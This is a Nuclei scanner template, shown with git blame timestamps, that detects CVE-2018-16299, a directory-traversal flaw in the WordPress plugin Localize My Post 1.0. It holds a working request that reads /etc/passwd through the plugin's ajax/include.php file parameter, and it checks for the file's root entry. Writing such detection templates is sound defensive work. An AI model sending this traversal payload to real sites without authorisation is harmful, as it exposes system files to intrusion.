nuclei-templates/cves/2018/CVE-2018-16299.yaml

26 lines
661 B
YAML
Raw Normal View History

id: CVE-2018-16299
2021-06-24 22:46:32 +00:00
info:
name: WordPress Plugin Localize My Post 1.0 - LFI
2021-07-19 12:47:12 +00:00
author: 0x_Akoko,0x240x23elu
2021-06-24 22:46:32 +00:00
severity: high
2021-08-30 09:50:56 +00:00
description: The Localize My Post plugin 1.0 for WordPress allows Directory Traversal via the ajax/include.php file parameter.
2021-06-24 22:46:32 +00:00
reference: https://www.exploit-db.com/exploits/45439
2021-06-25 07:15:04 +00:00
tags: wordpress,cve2018,cve,lfi
2021-06-24 22:46:32 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
2021-07-24 21:35:55 +00:00
- "root:.*:0:0"
2021-06-24 22:46:32 +00:00
- type: status
status:
- 200